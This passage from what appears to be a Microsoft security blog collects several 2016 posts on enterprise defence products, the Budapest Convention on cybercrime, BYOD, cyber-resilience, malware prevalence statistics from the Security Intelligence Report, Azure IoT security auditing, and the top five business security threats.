    If an attacker still manages to deliver malware through to one of the organization’s employees by some other mechanism (e.g., via personal email), Windows 10’s security features are designed to both stop the initial infection, and if infected, prevent further lateral movement. Specifically, Windows Defender Application Guard uses new, hardware based virtualization technology to wrap a protective border around the Edge browser.  Even if malware executes within the browser, it cannot access the underlying operating system and is cleaned from the machine once the browser is closed.  Windows Device Guard provides an extra layer of protection to ensure that only trusted programs are loaded and run preventing the execution of malicious programs, and Windows Credential Guard uses the same hardware based virtualization technology discussed earlier to prevent attackers who manage to gain an initial foothold from obtaining other credentials stored on the endpoint.  And finally, Windows Defender Advanced Threat Protection is the DVR for your company’s security team.  It provides a near real-time recording of everything occurring on your endpoints and uses built-in signatures, machine learning, deep file analysis through detonation as a service, and the power of the Microsoft Intelligent Security Graph to detect threats.  It also provides security teams with remote access to critical forensic data needed to investigate complex attacks.
  • Microsoft Advanced Threat AnalyticsThis technology disrupts the lateral movement phase by detecting lateral movement attack techniques early, allowing for rapid response.
    If an attacker still manages to get through the above defenses, compromise credentials, and moves laterally, the Microsoft Advanced Threat Analytics (ATA) solution provides a robust set of capabilities to detect this stage of an attack.  ATA uses both detection of known attack techniques as well as a user-based analytics that learns what is “normal” for your environment so it can spot anomalies that indicate an attack. Microsoft ATA can detect internal recon attempts such as DNS enumeration, use of compromised credentials like access attempts during abnormal times, lateral movement (Pass-the-Ticket, Pass-the-Hash, etc.), privilege escalation (forged PAC), and domain dominance activities (skeleton key malware, golden tickets, remote execution).
  • Azure Security Center – While Microsoft ATA detects cyber attacks occurring within an organization’s data centers, Azure Security Center extends this level of protection into the cloud.

And now for the best part.  As shown in the image below, each of the above listed technologies is designed to work seamlessly together and provide security teams with visibility across the entire kill chain.

disrupting-the-kill-chain

Each of these technologies also leverage the power of the Microsoft Intelligent Security Graph, which includes cyber threat intelligence collected from Microsoft’s products and services, to provide the most comprehensive and accurate detections.

  • Cloud App Security, Intune, Azure Information Protection, and Windows 10 Information Protection – And finally, the Microsoft Secure and Productive Enterprise Suite provides significant capabilities to classify and protect data and prevent its loss.  Among other capabilities, Microsoft Cloud App Security can identify and control the use of unsanctioned cloud applications.  This helps organizations prevent data loss, whether from an attack or rogue employee, via cloud-based applications.  Intune and Windows 10 Information Protection prevent corporate data from being intermingled with personal data or used by unsanctioned applications whether on a Windows 10 device or on iOS or Android based mobile devices.  And finally, Azure Information Protection provides organizations and their employees with the ability to classify and protect data using digital rights management technology.  Organizations can now implement and enforce a need-to-know strategy thereby significantly reducing the amount of unencrypted data available should an attacker gain access to their network.

Finally, Microsoft’s Enterprise Cybersecurity Group (ECG) also offers a range of both proactive and reactive services that leverages the capabilities of the Secure and Productive Enterprise suite in combination with the Intelligent Security Graph to help companies detect, respond to, and recover from attacks.

In the coming weeks, I will be following up with blogs and demos that go deeper into each of the above listed technologies and discuss how companies can most effectively integrate these solutions into their security strategies, operations, and existing technologies.  To learn more about Microsoft technologies visit Microsoft Secure..

Categories: Cloud Computing, cybersecurity Tags:

The Budapest Convention on Cybercrime – 15th Anniversary

This post was authored by Gene Burrus, Assistant General Counsel

November 2016 marks the 15th anniversary of the Convention on Cybercrime of the Council of Europe, commonly referred to as the Budapest Convention.

The treaty is the preeminent binding international instrument in the area of cybercrime. It serves as a guideline for countries developing national legislation and provides a framework for international cooperation between countries’ law enforcement agencies, so critical to cybercrime investigation and prosecution.

Since its inception, 50 countries have recognized this reality by acceding to it, with an additional six signing it, and a further 12 having been invited to do so. Its influence extends far beyond those countries, with a number of international organizations participating in the Convention Committee and many other countries looking at it for best practices.

The Budapest Convention’s success lies in part in the fact that it has not held still. As technology evolved, the Convention’s members sought to adopt a set of recommendations to make mutual legal assistance requests more efficient, as well as begun to investigate how to ensure that its premises are still valid under the new paradigm of cloud computing.

The importance of this to Microsoft, and its customers, is large and increasing. Estimates of global financial losses from cybercrime exceed $400 billion a year. And that number understates the less tangible impacts on privacy, trust, innovation and adoption of new technologies. Thus, effectively fighting cybercrime is of critical importance to Microsoft’s business.

In addition, the process of detecting and investigating cybercrime often involves private technology providers like Microsoft and partnerships between Microsoft and law enforcement. Driving towards the objectives of the Budapest Convention – to drive a common harmonized set of criminal prohibitions, and to facilitate international cooperation – is directly beneficial to our customers. Greater harmonization among national approaches on criminalizing behavior, criminal procedure and investigative capabilities are critical to helping companies like Microsoft ensure compliance with what otherwise might be conflicting legal obligations under different legal regimes.

The Convention’s main objectives are two-fold: to drive a common harmonized set of criminal prohibitions, and to facilitate international cooperation. Setting prohibitions and facilitating cooperation is important for Microsoft when it is looking to help protect customers. The first step in fighting cybercrime often consists of ensuring that the country where a perpetrator might live actually has laws against cybercrimes. Absent this, a perpetrator can act with impunity in a so called safe haven. The Convention defines a number of different types of crimes that can be committed online, providing a common frame of reference for its members, including:

  • Hacking crimes involving unlawfully accessing, intercepting or interfering with computers and computer networks;
  • Computer related fraud crimes;
  • Content related crimes, such as child pornography.

Secondly, the Convention aims to provide for criminal procedure necessary to investigate and prosecute cybercrimes, and to set up a fast, efficient, effective regime for cooperation between law enforcement in different nations. The latter is critical for Microsoft to help protect its customers. By its very nature cybercrime is almost always international in its scope. Perpetrators sitting in one country often attack victims in other countries, frequently using servers and networks sitting in yet others. Therefore, there must be procedures and mechanisms in place to facilitate and enable cooperation between and among the countries where the victims, the perpetrators, and the computer systems are physically located.

Finally, and outside the scope or the powers of the Budapest Convention, the practical reality of motivating a country housing a perpetrator, but which may have few nationals as victims itself, to spend resources addressing that crime must be overcome. That will continue to be easier said than done, until all countries come to a realization that trust in the online environment is mutually beneficial and difficult to maintain. Lack of trust it will impact all online economies, no matter where the criminals come from.

On its 15th birthday the Budapest Convention has been established as the gold standard of international conventions in the area of cybercrime. It’s a critical tool in our efforts to help protect and secure our products and our customers against cybercriminals. We hope that in the coming years more countries join it in an effort to eradicate the most modern of crimes.

Categories: cybersecurity Tags:

Securing the new BYOD frontline: Mobile apps and data

With personal smartphones, tablets, and laptops becoming ubiquitous in the workplace, bring your own device (BYOD) strategies and security measures have evolved. The frontlines have shifted from the devices themselves to the apps and data residing on—or accessed through—them.

Mobile devices and cloud-based apps have undeniably transformed the way businesses operate. But they also introduce new security and compliance risks that must be understood and mitigated. When personal and corporate apps are intermingled on the same device, how can organizations remain compliant and protected while giving employees the best productivity experience? And when corporate information is dispersed among disparate, often unmanaged locations, how can organizations make sure sensitive data is always secured?

Traditional perimeter solutions have proved to be inadequate in keeping up with the stream of new apps available to users. And newer point solutions either require multiple vendors or are just too complex and time-consuming for IT teams to implement. Companies need a comprehensive, integrated method for protecting information—regardless of where it is stored, how it is accessed, or with whom it is shared.

Microsoft’s end-to-end information protection solutions can help reconcile the disparity between user productivity and enterprise compliance and protection. Our identity and access management solutions integrate with existing infrastructure systems to protect access to applications and resources across corporate data centers and in the cloud.

The following Microsoft solutions and technologies provide access control on several levels, offering ample coverage that can be up and running with the simple click of a button:

Identity and access management

Simplify user access with identity-based single sign-on (SSO). Azure Active Directory Premium (Azure AD) syncs with existing on-premises directories to simplify access to any application—even those in the cloud—with a secured, unified identity. No more juggling multiple combinations of user names and passwords. Users sign in only once using an authenticated corporate ID, then receive a token enabling access to resources as long as the token is valid. Azure AD comes pre-integrated with thousands of popular SaaS apps and works seamlessly with iOS, Android, Windows, and PC devices to deliver multi-platform access. Not only does unified identity with SSO simplify user access, it can also reduce the overhead costs associated with operating and maintaining multiple user accounts

Secure and compliant mobile devices

Microsoft Intune manages and protects devices, corporate apps, and data on almost any personal or corporate-owned device. Through Intune mobile device management (MDM) capabilities, IT teams can create and define compliance policies to meet specific business requirements, deploy policies to users or devices, and monitor device and/or user compliance from a single administration console. Intune compliance policies deliver complete visibility into users’ device health, and enable IT to block or restrict access if the device becomes non-compliant. IT administrators also have the option to install device settings that perform remote actions, such as passcode reset, device lock, data encryption, or full wipe of a lost, stolen, or non-compliant device.

Conditional access

Microsoft Intune can also help reinforce access protection by verifying the health of users and devices prior to granting privileges with conditional access policies. Intune policies evaluate user and device health by assessing factors like IP range, the user’s group enrollment, and if the device is managed by Intune and compliant with policies set by administrators. During the policy verification process, Intune blocks the user’s access until the device is encrypted, a passcode is set, and the device is no longer jailbroken or rooted. Intune integrates with cloud services like Office 365 and Exchange to confirm device health and grant access based on health results.

Multi-factor authentication

Multi-factor authentication is a feature built into Azure Active Directory that provides an additional layer of authentication to help make sure only the right people have the right access to corporate applications. It prevents unauthorized access to on-premises and cloud apps with additional authentication required, and offers flexible enforcement based on user, device, or app to reduce compliance risks.

To learn more about BYOD security, download the free eBook, Protect Your Data: 7 Ways to Improve Your Security Posture

 

Cybersecurity and cyber-resilience – Equally important but different

November 3rd, 2016 No comments

The  October Mirai-based IoT attack demonstrated an important and often neglected consequence of technology’s expansion into every aspect of our daily lives, as well as into the systems that underpin our economies and societies. We have never been as exposed to cyberattacks and because technology’s pervasiveness in our lives the possible consequences of attacks, such as the one that occurred last month, are going to be more widespread and troublesome than in the past.

The particulars of the attack, from its scale to the use of everyday devices such as webcams, are interesting and worrying in themselves (see here and here for excellent pieces) but they also raise a key question. Security professionals have long accepted that no interconnected system will ever be 100% secure, and that there will soon come a time when even the fundamental underpinnings of the Internet itself could be put at genuine risk of failure due to cyberattacks. If this is the case, should the resources we put into preventing successful cyberattacks be matched by our preparations for handling the a successful attack’s consequences? In other words, shouldn’t cyber-resilience be treated on a par with cybersecurity?

From a policy-making perspective, one challenge in answering this question is that there is no global definition of cyber-resilience, and therefore only limited agreement on how to achieve it. Even if we can sidestep this theoretical hurdle and consider how we could design our systems (social, commercial, political) so that they would be able to continue to operate at some level in the face of “black-swan” violations of those systems’ fundamental assumptions, we are not much closer to a solution. Suggesting we plan for even a brief period where, for example, there is simply no electricity may seem like planning for the sun not rising one morning. The reality is, however, that cyberattacks are not zero sum games where a breach means unavoidable system failure. With complex technologies there will be as many ways of working around an attack, as there are ways of carrying it out. Investing in cyber-resilience will make this practicable.

How could that be achieved? I believe it will be critical that we focus on readiness, responsiveness and being able to reinvent our systems and processes over the course of a cyberattack. Readiness is a long-term function, underpinned by assessing and managing risks, and developing capabilities for response and recovery in the event of disruptions. Responsiveness is the detection, identification and alleviation of a cyberattack as it happens, keeping systems functioning in the process of doing so. Reinvention will lead off from the response, and should seek to adapt to what might be either a period of extended stress or a short, sharp shock, finding new ways to protect systems and deliver services that have been disrupted.

The structures and processes necessary for this kind of cyber-resilience are distinct from those that go into cybersecurity, although there are some shared technical skills and processes. For any organization realistically comparing its cybersecurity needs with its cyber-resilience needs, however, the differences between the two are clear. Specifically, resilience requires there to be a focus on culture, as much as there is on technology. Organizational leadership needs to set forward-looking, outcome-oriented goals with clear accountability, and to foster planning at all levels. Creativity in managerial, operational, and technological approaches is also essential, encouraging teams facing the consequences of a cyberattack to take risks, fail fast, learn faster, and maintain a can-do attitude in the face of adversity. Investment in research, education, and identification of best practices needs to underpin this cultural aspect in the long-term.

In conclusion, cybersecurity and cyber-resilience should be recognized as two distinct, but complementary disciplines. These disciplines grow more crucial with the rapid evolution and increasing ubiquity of technology in our modern society. For now, cybersecurity gets more headlines than resilience amongst political and business leaders, but one without the other will never be enough to secure our societies and economies or sufficient to withstand the chronic stresses and acute shocks.

 

Categories: cybersecurity, Cybersecurity Policy Tags:

How cyber threats affect enterprise and consumer devices

Over the past decade, Microsoft has methodically studied the evolving cyber threat landscape. We share what we learn twice a year in our Security Intelligence Report, and the most recent issue reveals some important differences between consumer devices and enterprise threats.

Attackers don’t view all attack vectors equally – home computer users and enterprise users tend to be exposed to a different mix of threats due to different usage patterns. These usage patterns can influence the type of cyber-attack attempted. Typically, users in work settings perform business activities while connected to a company network. Users in these situations may also have limitations regarding use of the Internet and email for personal use.

On the other hand, consumers generally connect to the Internet directly or use a home router (a personal network). Here, consumers more often use computers for activities like social media, personal email, playing games, watching videos, consuming content, and shopping.

Active Directory Domains vs. Non-Domains

Microsoft antimalware products and tools produce telemetry data that reveal if infected computers belong to an Active Directory Domain Services (ADDS) domain. (Computers that do not belong to an ADDS are more likely to be for personal or other non-enterprise use).

By comparing the threats ADDS computers encounter with those of non-ADDS computers, we can gain compelling insights into the stark differences between personal and enterprise security attacks and can begin to understand which threats are most likely to succeed in each environment.

As the following table shows, enterprise computers encounter less malware and encounter different kinds of threats than consumer computers do.

Malware and unwanted software encounter rates by category for domain-based and non-domain computers during the second half of 2015.

Malware and unwanted software encounter rates by category for domain-based and non-domain computers during the second half of 2015.

Our analysis of related data collected over the course of 2015 reveals the following:

  • Non-domain computers encountered disproportionate amounts of unwanted software compared to domain-based computers, with Adware, Browser Modifiers, and Software Bundlers each appearing between three and six times as often on non-domain computers
  • Domain-based computers encountered exploits nearly as often as their non-domain counterparts, despite encountering less than half as much malware as non-domain computers overall
  • Six families—Win32/SupTab, Win32/Diplugem, Win32/Gamarue, Win32/Skeeyah, Win32/Peals, and Win32/OutBrowse—were common to both lists; all were more frequently encountered on non-domain computers than on domain-joined computers
  • The four families that were unique to the top ten list for domain-joined computers but not for non-domain computers are the exploit kit JS/Axpergle, the Trojan family Win32/Dorv, the worm family Win32/Conficker, and the generic detection INF/Autorun

In addition, the encounter rate for consumer computers was about 2.2 times as high as the rate for enterprise computers during the second half of 2015.

How to stay updated on emerging threats

The threat landscape has changed dramatically in recent years. Constant vigilance is needed to maintain visibility into emerging vulnerabilities so you can make the adjustments necessary to help protect your organization and customers. From big data analysis to continuous machine learning and human intelligence, security demands a holistic approach to ensure your organization is prepared to handle new attacks.

Visit www.microsoft.com/security/sir to gain a deeper understanding about the security threats that affect your environment. Learn more about Security at Microsoft Secure.

Securing the Internet of Things: Introducing the Security Program for Azure IoT

This post is authored by Sam George, Partner Director Program Management, Azure IoT

As the Internet of Things (IoT) continues to gain traction in the enterprise, questions of security and privacy are top of mind for business decision makers, executives and IT alike. In our work with customers, we find many businesses are struggling to determine how secure their end-to-end IoT infrastructure is, or even delaying IoT implementations until security best practices and standards can be established and confirmed.

Our goal at Microsoft to keep our customer’s IoT solutions secure.  We already do this on multiple levels, ranging from the cloud and beyond – including Azure’s enterprise-grade security, working with standards bodies on IoT security, and providing comprehensive security recommendations and guidance – to individual assets that only support secure protocols when connecting to devices and the Windows 10 IoT Core secure IoT operating system.

While these are all important aspects of IoT security, we have heard from enterprises that they want additional security assurances to make sure they have assembled their IoT solutions in a secure way from devices, to connectivity, to cloud.

Today, I’m thrilled to announce the Security Program for Azure IoT.  This new program brings together a curated set of best-in-class security auditors customers can choose from to perform a security audit on their IoT solutions, find issues and provide recommendations.  The Security Program for Azure IoT will work from the ground up, examining everything from a businesses’ devices and assets to gateways and even communication to the cloud.

Our initial best-in-class security auditors include Casaba Security LLC, CyberX, Praetorian, and Tech Mahindra and will expand as the program grows. Microsoft will also be working with these security auditing partners and standards organizations, such as the Industrial Internet Consortium (IIC), to establish industry protocols and best practices for security auditing. This is part of our commitment to establish a vibrant and safe IoT ecosystem.

In all our security efforts, Microsoft works with security partners to help protect businesses – and ultimately help us raise the bar across the industry. Select Azure IoT customers will be the first to take advantage of this program to evaluate their end-to-end IoT infrastructure and manage their security risk. In the coming months, we’ll continue to provide updates on the Security Program for Azure IoT, our global auditing partners, and auditing standards.

In the meantime, we invite you to learn more from our Securing Your IoT Deployment and Securing Your Internet of Things from the Ground Up whitepapers. You can also read more about our public recommendations for cybersecurity and IoT standards or attend our upcoming talk at IoT Solutions World Congress on Trustworthy Internet of Things Infrastructure. For more information about the security auditing program, please visit our partner page on www.InternetofYourThings.com.

Security Intelligence Report: Discover the top cybersecurity threats by country

Security professionals know there’s no silver bullet to achieve perfect security—the volume and magnitude of cyber threats vary considerably depending on country and threat type. For example, during the second half of 2015 (2H15), encounter rates for some types of threats in Russia and Brazil were nearly three times the worldwide average. Of the ten most commonly encountered threat families in Russia in 2H15, five were trojans, including Win32/Peals, Win32/Skeeyah, Win32/Dynamer, and Win32/Spursint. And in Brazil, Suptab and the downloader/dropper families Win32/Sventore and Win32/Banload topped the threat list.

To help track the constantly shifting security terrain and meet demand for insights, twice each year Microsoft publishes the Security Intelligence Report (SIR), a comprehensive security analysis based on data we collect from around the world. The latest findings were published in May.

A relative look at the worldwide prevalence of malware

The current SIR gives an overarching view of the security situation around the world during the second half of 2015. It also provides more granular details to help you understand specific threats facing the areas you are concerned about right now.

Here are some of the country-specific malware patterns described in the SIR:

  • France and Italy both had high encounter rates for Browser Modifiers, led by Win32/SupTab and Win32/Diplugem.
  • Russia had a significantly higher encounter rate for Trojans than the other locations listed, led by Win32/Peals, Win32/Skeeyah, Win32/Dynamer, and Win32/Spursint; all four Trojans disproportionately affected computers in Russia and eastern Europe in the fourth quarter of 2015.
  • Worms were particularly prevalent in Brazil, led by VBS/Jenxcus, Win32/Gamarue, and JS/Bondat.
  • The highest encounter rates for adware were in Brazil, France, and Italy; Win32/EoRezo was the most commonly encountered adware family in all three locations.
  • Viruses were particularly prevalent in China, led by DOS/JackTheRipper and Win32/Ramnit.

The following table previews regarding the relative prevalence of various categories of malware in several locations around the world in the fourth quarter of 2015. Here are some tips for interpreting the findings:

  • Within each row, darker colors indicate more prevalent categories in each location.
  • Lighter colors signify that the threat category is less common.
  • The locations are arranged by the number of computers that reported threat detections during the second half of 2015.
The relative prevalence of different categories of malware in the fourth quarter of 2015 in several countries around the world.

The relative prevalence of different categories of malware in the fourth quarter of 2015 in several countries around the world.

Read the full report to learn more about security threats in your region and better understand what location-specific factors may affect your ability to create a secure environment for your organization.

Factors that cause high cybersecurity infection rates

Threat dissemination can be highly dependent on language and socioeconomic factors. In addition, distribution methods can play a considerable role. For instance:

  • Attackers frequently use techniques that target people based on their native language.
  • For threat vectors, attackers employ online services that are local to a specific geographic region.
  • In some situations, attackers target vulnerabilities or operating system configurations and applications that show up disproportionately in a given location.

Microsoft’s commitment to ongoing cybersecurity analysis

We are committed to help reduce cyber threat infection rates on a regional and global scale. The SIR is just one aspect of this work. Through the regularly updated insights it allows, we aim to help inform policymakers and IT professionals about malware trends, and arm them to act accordingly.

We encourage you to evaluate your security stance in the light of our latest SIR report, so you can help defend your organization against the most significant risks it faces.

Visit www.microsoft.com/security/sir today to discover the security risks that threaten your organization. To learn more about Microsoft’s Security products visit us at Microsoft Secure.

Cybersecurity: a question of trust

This post is authored by Robert Hayes, Senior Director and Chief Security Advisor in Microsoft’s Enterprise Cybersecurity Group.

With the scale, scope, and complexity of cyber-attacks increasing by the week, cybersecurity is increasingly being seen as a primary issue for CEOs & Boards.

Advice is not hard to find, and there are a multitude of information sources and standards; the in-house CIO will have a view, and of course there are a myriad of vendors, each with a solution that promises to be the answer to all security problems.

Trust is at the heart of a successful security strategy, yet knowing who and what can be trusted, and whether that trust should be absolute or conditional, is extremely difficult.

In my conversations with CEOs I often ask them their degree of trust in five key security related areas:

  • The people who work in their organization
  • The organizations in their supply chain
  • The integrity, resilience & security of their existing infrastructure
  • The integrity, resilience & security of cloud based infrastructures
  • The advice they receive, both internal & external

Unsurprisingly, the answer to each question is always varying degree of conditional, but not absolute trust.

Where the conversation becomes interesting, is where the CEO and I then jointly explore whether the infrastructure, processes, and policies of their organization reflect their intent to avoid absolute trust in these five key areas. Invariably, the answer is no.

Recurring examples of this inconsistency, each carrying significant organizational risk, are:

  • IT administrators having unfettered and unaudited access to all corporate systems without effective security mitigations such as multi-factor authentication, and privileged access workstations in place.
  • HR departments not instructing the IT department to cancel user access privileges for days, often weeks, after an employee is terminated or leaves the company.
  • Supply chain contracts drawn up with no security provisions, standards, or audit clauses.
  • No due diligence or impartial advice at Board level on the assurances and assertions made by both in-house IT teams and vendors on integrity, resilience and security.

A common closing theme of these conversations is the need for CEOs and Boards to have impartial advice and support to help them robustly challenge and undertake effective due diligence in this critical area, and the difficulty achieving this.

In the US proposed SEC regulation will mean that companies, in particular publicly listed firms, must have a cyber expert on their Board, yet there are currently very few executive or non-executive directors with this skill set, and who are comfortable operating at a Board level.

An alternative, but expensive position is to buy in the skill set from a third party, and there are many consultancies who will be delighted to have this conversation. However, some consultancies also have a vested interest in system integration, and their advice may not be as impartial as it seems.

Finally, there exists the challenging option of changing the relationship with key suppliers away from the classic customer – vendor to one closer to trusted strategic partner, supported by a robust due-diligence process. Many organizations are seeking to move closer to this type of relationship, whilst still maintaining sufficient distance to satisfy probity and procurement rules.

Whilst each of these options have challenges, the reality remains that without a trusted cybersecurity advisor, CEOs and Boards will continue to make decisions without effective challenge or scrutiny, that leave their organization vulnerable to cyberattack.

To learn more about how Microsoft can help you ensure security while enabling your digital transformation, visit us a Microsoft Secure.

Robert Hayes is a Senior Director and Chief Security Advisor in Microsoft’s Enterprise Cybersecurity Group.

Categories: cybersecurity, SEC, security Tags:

Top Five Security Threats Facing Your Business and How to Respond

This post was authored by Ann Johnson, Vice-President, Enterprise Cybersecurity Group

Headlines highlighting how vulnerable we are to cyber threats are now all too commonplace. The statistics on security events and successful network breaches continue a trend that favors attackers. These bad actors are getting faster at network compromise and data theft while their dwell times inside networks have increased to over 200 days according to most of the major annual cybersecurity reports. The result of these voluminous and persistent threats has been hundreds of millions of dollars in lost business alone without counting the long term costs of diminished customer and citizen confidence.

Still organizations may face even greater risks as they try to fend off sophisticated attackers against a backdrop of an ever expanding network footprint.  The new network now includes myriads of personal devices, virtualized workloads, and sensors that represent rapidly increasing points of connectivity as well potential compromise.

When considering these trends, it is clear that the traditional means of protecting organizations are not as effective as they once were. Static access controls like firewalls and intrusion prevention systems placed at network ingress and egress points are being easily evaded by attackers because the communications paths in and out of networks are too complex and dynamic. Also broad use of personal devices inside corporate networks has dissolved what used to be a hardened network boundary. We no longer conduct business within a perimeter of highly controlled, corporate-issued end user devices that gain access only under the strictest of authentication and authorization controls. Instead, the modern enterprise enables dynamic communities of employees, contractors, business partners and customers as well as their data and applications, all connected by an agile digital fabric that is optimized for sharing and collaboration.

In today’s networks then, we have to consider that identity is the new perimeter to be protected. Identity in this case does not mean only the device and its physical location but also the data, applications and user information it contains. Given that 60% of all breaches still originate at an endpoint compromised through a phishing scam or social engineering attack, it is no wonder that a risk mitigation strategy with identity at its center, is top of mind for many business and technology leaders.

In fact, cyber security is a boardroom level agenda item today. Business leaders want to ensure that they have in place the investments necessary to protect intellectual property and customer data, keeping their businesses out of the headlines that damage reputation and affect profitability. CIOs and CISOs feel caught between seemingly opposing goals of enabling digital transformation while protecting data and intellectual property at all times. These are concerns they share with their teams in IT and operations who feel equally burdened to balance performance and accessibility with rightful and appropriate resource use. Cybersecurity as we have all come to understand, can be either a critical barrier or key enabler to an organization’s ability to be productive. Current top of mind concerns for protecting the modern enterprise coalesce around 5 key areas: infrastructure, SaaS, devices, identity and response.

  1. Infrastructure – The public cloud offers unlimited potential for scaling business. On-demand compute and storage are only a small portion of the benefits of a highly agile IT environment. Easy access to applications, services and development environments promises to redefine business agility. Naturally, more and more organizations are taking critical workloads to the public cloud. Still the migration to an environment that is provisioned and managed by a non-organizational stakeholder creates new security challenges. So the top of mind question is: “How do I secure my cloud resources?”

Going to the cloud does not mean relinquishing security control or accepting a security posture that is less secure for cloud-hosted workloads relative to premised ones. In fact, the selection of cloud provider can mean having access to the very latest in security technologies, even more granular control and faster response than is possible with security in traditional networks. As a first step, security stakeholders need to understand how sensitive and compliance intense their cloud-hosted workloads and data are.  They should then opt for access controls that limit use to only that which is business appropriate and emulate those access policies already in place for premised workloads. Enrolling in cloud workload access monitoring will also ensure that any events which are a deviation from desired security policies can be flagged as indicators of possible compromise. Cloud users should also be familiar with the security technologies offered by their provider whether native or through partnership. This gives cloud users options for implementing the kind of multi-tiered security architecture required to ensure least privilege access, inspect content and respond to potential threats.

Key takeaways

  • Monitor workload access and security policies in place
  • Identify deviations from security policies and indicators of possible compromise
  • Deploy new security controls appropriate for your cloud environment

2. SaaS – Whether a business is hosting critical workloads in the public cloud or not, its employees are surely using applications there. The convenience and ubiquity of these applications means broad user adoption for the ease of information sharing and collaboration they enable. As a result, important, security and compliance intense data maybe making its way to the public cloud without security stakeholder knowledge. The question from businesses then is:  “How do I protect my corporate data?”

Organizations want to make sure their employees are as productive as they can be. To that end many are allowing them to bring their own devices and even their own applications into the network. This agility comes with some added security risk. Fortunately, there are ways to mitigate it. Ultimately the goal is to derive all of the benefits these SaaS applications offer without violating company use and compliance policies for data sharing and storage. Additionally, firms must ensure that employees’ use of SaaS apps does not unwittingly enable data exfiltration by bad actors. Limiting risk comes down to enacting a few of the basics that ensure safe use. For starters, there’s a need to identify which SaaS applications are in use in the network and whether they are in line with company policy or on a safe list. Granular access rights management will limit the use of even the safe apps to those persons who have a business need for them. Where possible, policies should be in place that require data to be encrypted when at rest, especially if it is being stored in the cloud. Having the ability to periodically update the safe lists of apps and monitor all use, can potentially alert security administrators when those applications which are unsanctioned appear among an organization’s communications. With these types of facilities in place stakeholders maybe be promptly alerted to unsanctioned application use. At times, unwanted application use will be detected. This is the time to block those applications, modify or deprecate privileges allowing access to them and as a further precaution remotely wipe or delete data stored through use of those applications.

Key takeaways

  • Apply rights management, identify unsanctioned apps, contain, classify and encrypt data
  • Be notified of unauthorized data access or attempts
  • Block suspicious apps, revoke unauthorized access and remotely wipe company data

3. Devices – Smartphones, tablets, self- sourced laptops, these are the new network perimeter and at times its weakest links.  Whether owned by the organization or not, they most certainly contain business valuable data that is at high risk. Because mobile devices often connect from public networks and may not have the most up to date protections, these endpoints are popular targets for the installation of botnets or malware. Use of personally sourced devices is a new and seemingly permanent reality prompting organizations to broadly ask “How do I keep company information secure?”

Many years ago, risk from mobile devices was ameliorated by installed agents and thick clients that provided security controls right on the device itself in a centralized way. Today, with employee self-sourced devices, the installation of such clients is not always feasible. Still today’s security administrators have to accommodate a heterogeneous end-user device environment comprised of various form factors and OSes while applying consistent and organizationally sanctioned controls to all of them. A cloud-based approach can provide a lot of flexibility and control here. From the cloud, endpoint connectivity to network resources can be centrally managed through security policies that restrict where devices can go based on their security posture, installed protections or location-based access rights. Command of devices from a central location ensures not only consistent policy enforcement but automation so that when anomalous device behaviors or connection patterns are detected, centralized command can restrict access, quarantine the affected device and even wipe it clean so that the threat is fully contained.

Key takeaways

  • Manage company and personal devices to classify and encrypt data to ensure compliance
  • Automatically identify compromised or questionable end points
  • Quickly respond to quarantine, wipe and remediate compromised devices

4. Identity – Despite all of the investments organizations make in security and threat mitigation, identity will be compromised. The latest data tells us that way too many of us click on links and attachments that we should not. From that point on, the bad actor has gained a foothold in the network and may set about moving laterally, looking for sensitive information to steal while impersonating the legitimate user. This common scenario is what makes many businesses ask: “How can I ensure identity protection?”

All of the major cybersecurity reports and indices point to this as the most common component of a data breach – the stolen identity. A security strategy for any organization or business needs to have this as a central tenet. The protection and management of credentials that give resource access to customers, employees, partners and administrators is foundational to sound security practice. Implementing multi-factor authentication broadly for all applications and services is a good starting point. It should nevertheless be complemented by facilities for monitoring authentication and authorization events not only for users but also and especially for privileged users and administrators. This type of monitoring offers the best opportunity to identify attempts by attackers trying to move laterally through privilege escalation. Once flagged as suspicious and anomalous, optional automated response can ensure that access requirements are elevated on the fly and privilege escalation requests are verified as legitimate.

Key takeaways

  • Augment passwords with additional authentication layers
  • Identify breaches early through proactive notification of suspicious behavior
  • Automatically elevate access requirements based on your policy and provide risk-based conditional access

5. Response – Each year organizations are subjected to tens of thousands of security events making the business of protecting critical assets continuous. Given that threat dwell times are 200 plus days, bad actors have ample opportunity to move “low and slow” throughout networks after the initial compromise. Naturally security administrators and stakeholders are left to ask: “How can I better respond to ongoing threats?”

The potency and frequency of today’s cyber threats requires a security strategy build on the assumption of compromise. A network or device may not be breached today but remains at risk so the process of protecting, detecting and responding to a breach is a continuous one. The data that is being exchanged by end points and shuttled among data centers and hybrid clouds contains a lot of information about the security state of those endpoints and resources. The key to unlocking that intelligence is analytics and specifically the type of analytics that is made possible through machine learning. Having the ability to monitor large amounts of traffic and information in a continuous fashion and unearth anomalous behavior is and will be key to shortening the time to detection of a breach or compromise. Behavioral analytics not only tell us what is out of the norm or unwarranted behavior but also informs of good and desired connectivity. By understanding both anomalous and appropriate traffic patterns, organizations can fine-tune access controls that are just right for enabling business yet limiting risk. Further, with continuous analytics the process of determining the right access controls for the environment at a given time can be as dynamic and responsive as users’ access needs.

Key takeaways

  • Use analysis tools to monitor traffic and search for anomalies
  • Use learnings from behavioral analysis to build a map of entity interactions
  • Practice just in time and just enough access control

In summary, security threats maybe common to businesses and organizations of all types but the way they are addressed can vary greatly. In the modern enterprise driven by mobility and cloud, architecting for security represents an opportunity for unprecedented agility.  With a strategy build on identity as the new perimeter and access to continuous processes to protect, detect and respond to threats, a business can be as secure as it is productive.  Watch the On-demand webinar – Top 5 Security threats – with Julia White and myself to hear more about our approach to cybersecurity or visit us at Microsoft Secure to learn more about Security.

Categories: cybersecurity, security, Tips & Talk Tags: